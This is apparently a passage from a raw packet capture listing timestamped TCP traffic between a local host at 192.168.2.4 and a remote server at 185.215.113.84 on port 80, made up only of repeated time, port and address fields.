                                                                                                                  Nov 30, 2024 01:55:24.652735949 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.652776957 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.653708935 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.653752089 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.653875113 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.653915882 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.654881001 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.654927015 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.655034065 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.655075073 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.656013966 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.656168938 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.656173944 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.656207085 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.657171011 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.657215118 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.657304049 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.657341957 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.658305883 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.658349037 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.658463955 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.658510923 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.659425020 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.659467936 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.801021099 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.801037073 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.801242113 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.801312923 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.801502943 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.801547050 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.802437067 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.802484035 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.802591085 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.802676916 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.803579092 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.803622961 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.803734064 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.803781033 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.804747105 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.804790974 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.804907084 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.804949999 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.805886030 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.805932045 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.806052923 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.806097031 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.807152033 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.807195902 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.807303905 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.807359934 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.808171988 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.808214903 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.808334112 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.808377981 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.809333086 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.809379101 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.809475899 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.809535980 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.810487986 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.810534954 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.810638905 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.810683012 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.811666965 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.811727047 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.811780930 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.811892033 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.812774897 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.812815905 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.812927008 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.812969923 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.813954115 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.813997984 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.814083099 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.814125061 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.815105915 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.815150976 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.815267086 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.815316916 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.816302061 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.816346884 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.816457987 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.816500902 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.817388058 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.817435980 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.817518950 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.817595959 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.818517923 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.818562984 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.818665981 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.818722963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.819694996 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.819739103 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.819818974 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.819901943 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.820843935 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.820885897 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.821012020 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.821054935 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.822024107 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.822086096 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.822151899 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.822243929 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.823127031 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.823170900 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.823286057 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.823331118 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.824302912 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.824347019 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.824457884 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.824497938 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.825433969 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.825479984 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.825584888 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.825630903 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.826560974 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.826605082 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.826716900 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.826765060 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.827740908 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.827785015 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.828115940 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.828161955 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.828874111 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.828919888 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.829035997 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.829081059 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.830020905 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.830066919 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.830197096 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.830241919 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.831190109 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.831233978 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.831310034 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.831398010 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.832348108 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.832407951 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.832468033 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.832567930 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.833478928 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.833523035 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.833647013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.833694935 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.834636927 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.834676981 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.834781885 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.834822893 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.835789919 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.835834026 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.835988998 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.836033106 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.836911917 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.836956978 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.837088108 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.837131977 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.838083029 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.838126898 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.838208914 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.838249922 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.839235067 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.839277029 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.839412928 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.839452028 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.840370893 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.840415001 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.840491056 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.840599060 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.841494083 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.841536999 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.841648102 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.841689110 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.842709064 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.842771053 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.842828989 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.842871904 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.843811989 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.843857050 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.844069004 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.844111919 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.844966888 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.845010996 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.845128059 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.845171928 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.846100092 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.846148014 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.846255064 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.846322060 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.847245932 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.847291946 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.847409964 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.847451925 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.848421097 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.848473072 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.848639011 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.848683119 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.849562883 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.849607944 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.849693060 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.849733114 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.850701094 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.850742102 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.850853920 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.850907087 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.851838112 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.851881981 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.852003098 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.852128983 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.853059053 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.853120089 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.853287935 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.853347063 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.854150057 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.854191065 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.854366064 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.854408979 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.855304956 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.855345964 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.855670929 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.855716944 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.856448889 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.856498003 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.856614113 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.856662989 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.857592106 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.857636929 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.857741117 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.857781887 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.858752966 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.858798027 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.858938932 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.858975887 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.859893084 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.859939098 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.860042095 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.860083103 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:24.860989094 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:24.861037016 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.002095938 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.002284050 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.002350092 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.002592087 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.002655983 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.002738953 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.002779961 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.003818989 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.003856897 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.003906965 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.003942013 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.004906893 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.004945993 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.005050898 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.005089998 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.006030083 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.006071091 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.006185055 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.006222963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.007181883 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.007338047 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.007381916 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.008330107 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.008475065 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.008516073 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.009488106 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.009526968 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.009644032 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.010396957 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.010632992 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.010673046 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.010782003 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.010821104 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.011768103 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.011806965 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.011928082 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.012881994 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.012929916 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.012984037 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.013067961 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.013154984 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.014074087 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.014230013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.014271975 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.015230894 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.015392065 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.015438080 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.016381025 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.016417027 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.016537905 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.017522097 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.017565966 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.017657995 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.018398046 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.018672943 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.018847942 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.018887997 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.019817114 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.019979954 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.020019054 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.020973921 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.021013021 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.021121025 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.022123098 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.022165060 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.022253990 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.022396088 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.023267984 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.023423910 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.023467064 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.024415970 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.024471045 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.024574041 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.024611950 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.025562048 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.025723934 CET8049740185.215.113.84192.168.2.4
